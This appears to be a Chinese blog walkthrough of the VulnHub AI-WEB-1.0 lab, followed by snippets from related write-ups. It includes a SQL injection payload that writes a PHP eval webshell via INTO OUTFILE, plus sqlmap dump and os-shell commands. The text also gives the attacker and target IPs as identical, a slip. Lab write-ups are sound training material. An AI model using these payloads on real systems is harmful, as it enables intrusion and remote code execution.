ai-web 1.0通关攻略

最新推荐文章于 2025-04-01 11:00:00 发布

原创最新推荐文章于 2025-04-01 11:00:00 发布 · 393 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#靶场 #信息安全 #AI-WEB-1.0

下载好靶机后，找到AI-WEB-1.0.vmx文件，双击打开，同时打开kali虚拟机，输入指令查找靶机ip

kali虚拟机ip为192.168.159.146，靶机ip为192.168.159.146

在浏览器打开网站

用dirb指令去扫

访问第二个网站，发现有两个目录，尝试访问发现访问不到

发现http://192.168.159.147/m3diNf0/info.php

找到http://192.168.159.147/se3reTdir777/index.php

发现是一个登录页面

输入单引号报错，判断闭合方式为单引号

找到绝对路径

根据绝对路径写木马文件

-1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/11.php" #

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

与神明画鸭

关注关注

3
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Vulnhub靶机：AI-WEB-1.0

m0_75036923的博客

08-19

443

sqlmap -r '/home/kali/桌面/1.txt' -D aiweb1 -T user --columns --dump --batch。$ sqlmap -u'/home/kali/桌面/1.txt' -D information_schema --tables --batch。$ sqlmap -r '/home/kali/桌面/1.txt' -D aiweb1 -T user --columns --batch。2.利用burp抓包进行注入。5.查user表中所有数据。

VulnHub靶场之AI Web 1.0

A_dmin的博客

05-20

743

VulnHub靶场之AI Web 1.0 废话不多说，直接开始实验，都是老套路起步了用vm打开靶机，运行kali和靶机首先肯定查看kali的ip地址，然后使用nmap命令：nmap -sP 192.168.80.0/24扫描主机：找到了靶机的IP地址，接下来进行端口扫描 nmap命令：nmap -p 1-65535 -sV 192.168.80.129 发现只开了一个80端口，我们进行访...

参与评论您还未登录，请先登录后发表或查看评论

AI-Web-1.0靶场

qq_46187131的博客

03-27

1694

1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。

AI-web-1.0

weixin_71053667的博客

07-29

312

3.在kali桌面写一句话木马文件，用 sqlmap 工具写入一句话木马。–file-dest:后面加要存放文件的地址。–file-write:去读取木马文件。2.使用kali，用sqlmap跑。3.直接使用--os-shell。1.打开靶机，扫端口目录。在os-shell查看。

AI-WEB-1.0

底层社会中的弱智

08-03

754

总结：报错注入常见的十种，本次用的是updatexml 获取os-sh的条件，具有可写权限的绝对路径需要自己拼接使用openssl passwd -1 salt xxx xxx构造hash 目标主机为192.168.49.158 攻击kali机为192.168.49.129 前期的信息收集，端口服务，目录扫描，web框架等端口服务：只开放80端口且存在两个目录访问web页面，使用nikto和dirb针对主机和目录进行探测：主页和前端源码没有提供信息查看下目录

AI-web1.0 靶机通关攻略

qq_65379983的博客

03-03

791

ai-web 1.0

Vulnhub-AI-Web1.0靶场通关攻略

最新发布

qq_65852138的博客

04-01

778

【代码】Vulnhub-AI-Web1.0靶场通关攻略。

aiweb1.0靶场通关攻略

2401_88387979的博客

12-04

762

虚拟机：kali靶机：ai-web-1.0。

AI-WEB-1.0超详细多方法教程

qq_61988806的博客

10-19

4363

AI-WEB-1.0 多方法渗透

VulnHub 靶机系列之AI-Web-1.0

2302_76838247的博客

09-10

3730

kali机下载地址（选择第一个下载，3G大小。

AI-WEB-1.0 靶机

weixin_53736204的博客

07-29

686

下载地址：下载压缩文件打开开启虚拟机。

AI-WEB-1.0简单攻略

在Web和Reverse坑里游泳中。。。。

07-17

3055

AI-WEB-1.0靶机的简单攻略

AI-WEB-1.0详细教程

2301_76631050的博客

07-29

750

这里2.php存放在/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/下。Ctrl+f 搜索一下/m3diNf0/，发现了路径：/home/www/html/web1x443290o2sdf92213/我们需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合它的绝对目录为。我们接下来的思路是写入木马，但是需要一个可写入路径需要我们找一下。上面我们扫到的目录有好几个不能访问，我们需要深入对他们扫描一下。

vulnhub靶机AI-Web-1.0渗透笔记

liver100day的博客

06-10

2576

AI-Web1靶机渗透笔记靶机环境搭建攻击渗透机： kali IP地址：192.168.75.128 靶机：AI-Web1 IP地址未知靶机下载地址：https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址确认目标靶机IP地址：192.168.75.134 1.2 端口扫描使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1

Vulnhub靶场--AI-Web-1.0提权获取flag

qq_53830529的博客

05-16

1187

vulnhub实战靶场中的AI-Web-1.0，使用两种SQL注入上传shell的方法，第一：SQLmap的--os-shell上传shell，第二：通过手动into outfile上传webshell。

AI-WEB-1.0获取shell

m0_74214882的博客

07-28

807

连接成功。

AI-WEB-1.0靶机教程

qq_42553928的博客

04-06

6948

文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权靶机概况下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi

AI-WEB-1.0靶机渗透教程文件上传漏洞

qq_48368964的博客

07-29

354

简单的扫描目录扫出来两个分别进去看看发现里面有两个接着扫描下第一个目录发现了info.php文件。